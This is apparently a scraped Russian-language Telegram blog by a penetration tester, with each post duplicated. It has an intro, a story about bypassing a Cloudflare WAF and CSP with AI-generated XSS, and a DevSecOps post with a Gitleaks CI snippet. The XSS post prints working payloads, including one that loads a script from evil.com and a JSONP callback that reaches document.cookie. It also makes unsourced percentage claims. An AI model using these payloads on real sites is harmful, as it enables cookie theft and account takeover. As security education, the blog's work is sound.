Привет, коллега! Добро пожаловать в мой техноблог
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
О чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
alert(1) — это искусствоО чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
❤4👍3🔥2💩1
🔍 За кадром: Как я 3 недели ломал "неприступный" WAF
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
"><script>alert(1)</script>? WAF смеётся тебе в лицо. Даже хитрые вариации с обфускацией не проходили.И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
<img src=x onerror="eval('\u0069\u006d\u0070\u006f\u0072\u0074')('//evil.com/x.js')">WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
<div> превращается в исполняемый код.Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
trusted-domains — это швейцарский сыр, а не защита- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
❤7🔥5👍4
80% утечек данных в 2024 году — из-за паролей в коде. Это факт.
Недавно закончили аудит для крупного банка. 47 активных API-ключей в публичных репозиториях. СОРОК СЕМЬ!
Боты сканируют GitHub каждые 3-5 минут. Нашли твой ключ? Через 15 минут на твоём AWS майнят крипту. 50 GPU-инстансов. Счёт на $20,000 в сутки. Реальный кейс.
И это решается за 15 минут настройкой одного инструмента.
Вот готовый кусок .gitlab-ci.yml:
Всё. Любая попытка запушить секрет = заваленная сборка.
Но это только начало.
Помнишь Log4j? А у тебя в package.json 1500+ зависимостей. Сколько с критическими CVE?
Факты:
- Уязвимые зависимости = 31% всех атак
- Небезопасные Docker-образы = 14% инцидентов
- Ошибки в Terraform = 8% взломов ($5.7M в среднем!)
Магия DevSecOps:
Раньше: армия безопасников → проверяют после релиза → находят проблемы → откат → теряешь деньги
Сейчас: проверки в CI/CD → робот находит баги за секунды → фиксишь до релиза → спишь спокойно
Реальный результат клиента:
- Время на фикс багов: 2 недели → 2 часа
- Инциденты в проде: -87%
- Экономия на штрафах: $1.2M в год
Почему 90% проваливают внедрение?
Пытаются внедрить всё сразу. 2500 алертов в первый день. Разрабы в шоке. Инициатива мертва.
Правильный путь:
- Неделя 1: только секреты (0% false positives)
- Неделя 2-3: критические уязвимости
- Месяц 2: SAST в режиме предупреждений
- Месяц 3: полный Security Pipeline
Мой боевой стек (всё бесплатно):
- Gitleaks — ловит секреты
- Trivy — сканирует контейнеры и IaC
- Semgrep — SAST нового поколения
- DefectDojo — управление уязвимостями
Можно поднять за день. Без консультантов.
Кейс: стартап, 15 разрабов. Внедрили за неделю. Ещё через неделю поймали критическую уязвимость в log4j перед деплоем. Потенциальный ущерб: $500k.
А твой pipeline проверяет код на секреты? Или надеешься на внимательность разработчиков?
В полной статье:
• Готовый GitLab CI pipeline (копипасть и работает)
• 3 главные ошибки и как их избежать
• Пошаговая настройка всех инструментов
• Реальные кейсы провалов
Хочешь спать спокойно? Полная статья тут
P.S. Пока читаешь этот пост, где-то очередной AWS-ключ утекает в GitHub. Не дай этому быть твоим.
#devsecops #безопасность #cicd #пентест #devops
Недавно закончили аудит для крупного банка. 47 активных API-ключей в публичных репозиториях. СОРОК СЕМЬ!
Боты сканируют GitHub каждые 3-5 минут. Нашли твой ключ? Через 15 минут на твоём AWS майнят крипту. 50 GPU-инстансов. Счёт на $20,000 в сутки. Реальный кейс.
И это решается за 15 минут настройкой одного инструмента.
Вот готовый кусок .gitlab-ci.yml:
sast-and-secrets:
stage: test
script:
- wget -qO- https://github.com/gitleaks/gitleaks/releases/download/v8.18.0/gitleaks_8.18.0_linux_x64.tar.gz | tar xz
- ./gitleaks detect --source . --verbose --no-git
rules:
- if: $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH
Всё. Любая попытка запушить секрет = заваленная сборка.
Но это только начало.
Помнишь Log4j? А у тебя в package.json 1500+ зависимостей. Сколько с критическими CVE?
Факты:
- Уязвимые зависимости = 31% всех атак
- Небезопасные Docker-образы = 14% инцидентов
- Ошибки в Terraform = 8% взломов ($5.7M в среднем!)
Магия DevSecOps:
Раньше: армия безопасников → проверяют после релиза → находят проблемы → откат → теряешь деньги
Сейчас: проверки в CI/CD → робот находит баги за секунды → фиксишь до релиза → спишь спокойно
Реальный результат клиента:
- Время на фикс багов: 2 недели → 2 часа
- Инциденты в проде: -87%
- Экономия на штрафах: $1.2M в год
Почему 90% проваливают внедрение?
Пытаются внедрить всё сразу. 2500 алертов в первый день. Разрабы в шоке. Инициатива мертва.
Правильный путь:
- Неделя 1: только секреты (0% false positives)
- Неделя 2-3: критические уязвимости
- Месяц 2: SAST в режиме предупреждений
- Месяц 3: полный Security Pipeline
Мой боевой стек (всё бесплатно):
- Gitleaks — ловит секреты
- Trivy — сканирует контейнеры и IaC
- Semgrep — SAST нового поколения
- DefectDojo — управление уязвимостями
Можно поднять за день. Без консультантов.
Кейс: стартап, 15 разрабов. Внедрили за неделю. Ещё через неделю поймали критическую уязвимость в log4j перед деплоем. Потенциальный ущерб: $500k.
А твой pipeline проверяет код на секреты? Или надеешься на внимательность разработчиков?
В полной статье:
• Готовый GitLab CI pipeline (копипасть и работает)
• 3 главные ошибки и как их избежать
• Пошаговая настройка всех инструментов
• Реальные кейсы провалов
Хочешь спать спокойно? Полная статья тут
P.S. Пока читаешь этот пост, где-то очередной AWS-ключ утекает в GitHub. Не дай этому быть твоим.
#devsecops #безопасность #cicd #пентест #devops
👍6❤3🔥3👌1🤡1